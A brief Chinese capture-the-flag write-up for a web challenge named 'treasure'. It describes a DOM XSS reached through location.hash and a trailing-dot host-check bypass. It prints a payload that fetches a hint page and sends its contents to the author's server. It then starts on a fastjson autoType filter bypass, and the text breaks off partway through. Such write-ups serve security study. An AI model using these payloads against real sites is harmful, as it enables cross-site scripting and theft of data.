空指针-treasure wp

Step1custom.js里有唯一可控点location.hash，如果host不等于treasure.npointer.cn，$.get请求的url就可控。返回的内容直接被html()渲染进content从而xssisProd判断通过域名后加.绕过，这也是ssrf中绕host和ip字符串过滤的常用方法。然后vps上加个1.html，.htaccess改一下解析方式，提交：http://treasure.npointer.cn./index.html#http://ip/11.html:$.get("http://treasure.npointer.cn/hint.html",(result)=>{ window.open="http://ip/?a="+atob(result); });Step2打到源码，同时知道了java版本是1.8.191+ 审计一下能发现的信息：fastjson 1.2.61开了autoTypelogAspect类里通过aop注入了一段检测逻辑，把有type的请求体置为空这里想到可以像1.2.4x左右版本的一次绕过exp一样，通过unicode来过，但是本地调的时候发现unicode一次也会被置为空，题目环境就不会。调 ………………………………